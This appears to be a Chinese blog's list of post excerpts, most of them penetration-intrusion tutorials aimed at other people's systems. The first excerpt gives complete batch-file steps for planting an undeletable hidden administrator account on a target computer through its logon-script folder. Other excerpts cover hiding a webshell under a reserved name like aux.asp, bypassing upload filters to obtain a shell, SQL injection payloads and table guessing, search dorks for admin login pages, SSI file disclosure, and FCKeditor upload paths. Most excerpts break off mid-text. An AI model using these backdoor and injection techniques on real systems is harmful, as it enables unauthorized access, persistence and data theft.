Swane's blog

摘要： 建立一个别人永远删不掉的管理员用户操作步骤：1、在自己电脑里面建立一个.txt文本文件.2、在里面输入内容@echo offnet user xixi 123456 /add 注释：前面xixi是用户名后面123456是密码；net localgroup administrators xixi /add3、把这个文件保存，更改后缀为xixi.bat 注释：前面名字随便，后面格式一定要是bat；4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下，没有的话自己创建。完成，下次对方电脑无论如何都有这个管理员帐号，删除 阅读全文

摘要： Windows 下不能够以下面这些字样来命名文件/文件夹，包括：“aux”，“com1”“com2”“prn”“con”和“nul”等，但是通过cmd下是可以创建此类文件夹的，使用copy命令即可实现：D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp已复制 1 个文件。D:\AspWebServer\wwwroot>dir驱动器 D 中的卷没有标签。卷的序列号是 47747.net6-1D29D:\AspWebServer\wwwroot 的目录2010-04-25 14:41 <DIR> .2010-04-25 1 阅读全文

摘要： 上传漏洞拿shell：入侵渗透中用到的一些技巧和思路 1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马，拿到shell. 2.就是在上传时在后缀后面加空格或者加几点，也许也会有惊奇的发现。例：*.asp ,*.asp..。 3.利用双重扩展名上传例如：*.jpg.asa格式(也可以配上第二点一起利用)。 4.gif文件头欺骗 5.同名重复上传也很OK。：入侵渗透中用到的一些技巧和思路入侵渗透中用到的命令，语法：入侵渗透中用到的一些技巧和思路 set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息 tasklis 阅读全文

摘要： 利用DBO获得SQL管理权限和系统权限2009-01-08 16:33在一个供求信息发布的网站上测试了一下，页面http://www.xxx.com/new/new.asp?id=49我做了如下测试：(1) http://www.xxx.com/new/new.asp?id=49’ Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误在查询表达式 'ID=49'' 中。/new.asp，行36 (2) ht 阅读全文

摘要： 网上一直流传的后台绕过验证语句是'or'='or'，还有其他语句，例如a' or 'a'='a等，都是先闭合前面，然后构造语句，使到整个SQL语句最终结果为真，我们尝试一下看看 用google就可以快速找到后台页面，语法是：allinurl:adminstrator_login当然，语句是很灵活的，这个大家自己构造，我很快就找到了一个没过滤参数的后台找一个来试试我测试有没有过滤一般都是用admin'来做账号密码，提交后提示语法错误，不是有语法错误提示的就是，有一些是屏蔽了提示的，但同样没有被过滤，所以利用的时候要灵活些，我 阅读全文

摘要： 1.判断有无注入点' ; and 1=1 and 1=22.猜表: 常见的表:admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) ---判断是否存在admin这张表3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个and 0<(select count(*) from admin)and 1<(select count(*) from admin)4.猜 阅读全文

摘要： ################################################################################### PHP高级注入实例# Home: www.dis9.com ##################################################################################-----------------------------------系统信息-------------------------------------------http://www.52aysc.com/ 阅读全文

摘要： 1.判断是否有注入;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注入参数是字符’and [查询条件] and ”=’4.搜索时没过滤参数的’and [查询条件] and ‘%25′=’5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access6.猜数据库 ;and (select Count(*) from [数据库名])>07.猜字段 ;and (select Count(字 阅读全文

摘要： 作为swane在博客园开博了，之前在百度开的但是因为相关的一些因素，百度不是我理想的归宿，今天选择了这里，希望记录我之于net的点滴 阅读全文

摘要： 13 - canonical representation, but verbose - - typical configuration - - sometimes useful --> --> jdbc/e3java javax.sql.DataSource jdbc/e3java2 javax.sql.Da... 阅读全文

摘要： 方法:上传一个shtm文件, 内容为: 直接请求这个shtm文件,conn.asp就一览无遗, 数据库路径也就到手啦 解析:就是一条SSI指令,其作用是将"conn.asp"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示conn.asp其中的内容. 前提:服务器的对shtm或者shtml的扩展没有删除 后记:至于conn.asp可以为其他,比如con... 阅读全文

摘要： 关键字:本站基于 IdeaCMS v1.0 制作 admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://xxxx/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp /Upload/... 阅读全文

摘要： http://jigsaw.w3.org/css-validator/#validate_by_uri 站长资源信息网：www.ieou.cn 类别：站长资源信息网 查看评论 阅读全文